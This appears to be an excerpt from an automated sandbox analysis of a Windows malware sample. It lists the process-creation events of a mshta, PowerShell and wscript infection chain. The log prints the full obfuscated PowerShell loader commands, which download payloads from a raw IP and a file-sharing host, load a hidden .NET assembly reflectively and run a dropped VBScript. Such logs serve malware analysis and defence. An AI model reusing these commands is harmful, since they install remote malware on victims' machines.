          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES845C.tmp" "c:\Users\user\AppData\Local\Temp\mffkkngw\CSC9E50345C585C4EFF867E1FFD2050D1A6.TMP"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\vtjrhji C:\Users\user\AppData\Roaming\vtjrhji
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhvy0vsn21mywmgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicatbwvnymvszevgaw5pvelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxnt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkbkhytg8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagamxxtwh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiewsdwludcagicagicagicagicagicagicagicagicagicagicagifved1jcwentleludfb0ciagicagicagicagicagicagicagicagicagicagicagihffs3zxktsnicagicagicagicagicagicagicagicagicagicagicaglw5bbuugicagicagicagicagicagicagicagicagicagicagicaizhpuayigicagicagicagicagicagicagicagicagicagicagicattmfnzvnqqunficagicagicagicagicagicagicagicagicagicagicagbhhzqnrttvb2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryb2nfujdtzmfjojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzgvntmvc2vlbxlizxn0bmv0d29ya3doawnoz2l2zwjlc3r0agluz3nlbnrpcmvsawzld2l0ag1llnrjriisiirftny6qvbqrefuqvxzzwvtewjlc3ruzxr3b3jrd2hpy2hnaxzlymvzdhroaw5nc2vudglyzwxpzmv3axrolnziuyismcwwkttzvefydc1zbevfucgzkttjrvggicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzw15ymvzdg5ldhdvcmt3agljagdpdmvizxn0dghpbmdzzw50axjlbglmzxdpdggudmjtig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzzvlpbwfnzvunkydybca9ifb1swh0jysndhbzjysnoicrjy8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbccrj2uvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3qnkydhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngyguhvjo3nlwxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c2vzaw1hz2vcexrlcya9ihnlwxdlyknsawvujysndc5eb3dubg9hzerhdgeoc2vzaw1hz2vvcmwpo3nlwwltywcnkydlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhnlwwltywdlqnl0jysnzxmpo3nlwxn0yxj0rmxhzya9ifb1stw8qkftrty0xycrj1nuqvjupj5qduk7c2vzzw5kricrj2xhzya9ifb1sscrjzw8qkftrty0x0vord4+uhvjo3nlwxn0yxj0sw5kzxggpsbzzvlpbwfnzvrlehqusw5kzxhpzignkydzzvlzdgfydezsywcpo3nlwwvuzccrj0luzgv4id0gc2vzaw1hz2vuzxh0lkluzgv4t2yoc2vzzw5krmxhzyk7cycrj2vzc3rhcnrjbmrlecatz2ugmcatyw5kihnlwwvuzeluzgv4ic1ndcbzzvlzdgfydeluzgv4o3mnkydlwxn0yxj0sw5kzxggkz0gc2vzc3rhcnrgbgfnlkxlbmd0adtzzvliyxnlnjrmzw5ndgggpsbzzvllbmrjbmrlecatihnlwxn0yxj0sw5kzxg7c2vzymfzzty0q29tbwfuzca9jysnihnljysnwwltywcnkydlvccrj2v4dc5tdwjzdhjpbmcoc2vzc3rhcnrjbmrlecwnkycgc2vzymfzzty0tgvuz3rokttzzvliyxnlnjrszxzlcnnlzca9ic1qb2luichzzvliyxnlnjrdb21tyw5kjysnllrvq2hhckfycmf5kckgmnbpiezvckunkydhy2gtt2jqzwn0ihsgc2vzxyb9kvstms4ulshzzvknkydiyxnlnjrdb21tyw5klkxlbmd0acldo3nlwscrj2nvbw1hbmrcexrlcya9ifttexn0zw0uqycrj29udmvydf06okzyb21cyxnlnjrtdhjpbmcojysnc2vzymfzzty0umv2zxjzzwqpo3nlwscrj2xvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzsjysnzwn0aw9ulkfzc2vtymx5xscrjzo6tg9hzchzzvljb21tyw5kqnl0zxmpo3nlwxzhau1ldghvzca9ifsnkydkbmxpyi5jty5ib21lxs5hzxrnzxrob2qouhvjvkfjuhvjkttzzvl2ywlnzscrj3rob2qusw52bycrj2tlkhnlww51bgwsieaouhvjdhh0llrhukzgulcvmzuvodcxljq0lji3ms43mdevlycrjzpwdhrouhvjlcbqdulkzxnhdgl2ywrvuhvjlcbqdulkjysnzxnhdgl2ywrvuhvjlcbqdscrj0lkzxnhdgl2ywrvuhvjlcbqdulhc3buzxrfy29tcglsjysnzxjqduksifb1swrlc2f0axzhzg9qduksiccrj1b1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkbycrj1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkb1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1stfqduksuhvjzgvzyxrpdmfkb1b1sskpoycplnjfugxhq0uoj1b1sscsw1n0cklur11bq0hbul0zoskuckvqbgfdrsgnmnbpjywnfccplnjfugxhq0uoj3nlwscsjyqnkxwgliaokgdwiccqtwrykicplm5bbuvbmywxmswyxs1qt0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('seyimageu'+'rl = puiht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvst'+'grnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f pui;seywebclient = new-object system.net.w'+'ebclient;seyimagebytes = seywebclien'+'t.downloaddata(seyimageurl);seyimag'+'etext = [system.text.encoding]::utf8.getstring(seyimagebyt'+'es);seystartflag = pui<<base64_'+'start>>pui;seyendf'+'lag = pui'+'<<base64_end>>pui;seystartindex = seyimagetext.indexof('+'seystartflag);seyend'+'index = seyimagetext.indexof(seyendflag);s'+'eystartindex -ge 0 -and seyendindex -gt seystartindex;s'+'eystartindex += seystartflag.length;seybase64length = seyendindex - seystartindex;seybase64command ='+' se'+'yimag'+'et'+'ext.substring(seystartindex,'+' seybase64length);seybase64reversed = -join (seybase64command'+'.tochararray() 2po fore'+'ach-object { sey_ })[-1..-(sey'+'base64command.length)];sey'+'commandbytes = [system.c'+'onvert]::frombase64string('+'seybase64reversed);sey'+'loadedassembly = [system.refl'+'ection.assembly]'+'::load(seycommandbytes);seyvaimethod = ['+'dnlib.io.home].getmethod(puivaipui);seyvaime'+'thod.invo'+'ke(seynull, @(puitxt.tgrffrw/35/871.44.271.701//'+':ptthpui, puidesativadopui, puid'+'esativadopui, pu'+'idesativadopui, puiaspnet_compil'+'erpui, puidesativadopui, '+'puidesativadopui,puidesativado'+'pui,puidesativadopui,puidesativadopui,puidesativadopui,puidesativadopui,pui1pui,puidesativadopui));').replace('pui',[string][char]39).replace('2po','|').replace('sey','$')| . ((gv '*mdr*').name[3,11,2]-join'')"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhvy0vsn21mywmgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicatbwvnymvszevgaw5pvelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxnt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkbkhytg8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagamxxtwh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiewsdwludcagicagicagicagicagicagicagicagicagicagicagifved1jcwentleludfb0ciagicagicagicagicagicagicagicagicagicagicagihffs3zxktsnicagicagicagicagicagicagicagicagicagicagicaglw5bbuugicagicagicagicagicagicagicagicagicagicagicaizhpuayigicagicagicagicagicagicagicagicagicagicagicattmfnzvnqqunficagicagicagicagicagicagicagicagicagicagicagbhhzqnrttvb2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryb2nfujdtzmfjojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzgvntmvc2vlbxlizxn0bmv0d29ya3doawnoz2l2zwjlc3r0agluz3nlbnrpcmvsawzld2l0ag1llnrjriisiirftny6qvbqrefuqvxzzwvtewjlc3ruzxr3b3jrd2hpy2hnaxzlymvzdhroaw5nc2vudglyzwxpzmv3axrolnziuyismcwwkttzvefydc1zbevfucgzkttjrvggicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzw15ymvzdg5ldhdvcmt3agljagdpdmvizxn0dghpbmdzzw50axjlbglmzxdpdggudmjtig=='+[char]0x22+'))')))"
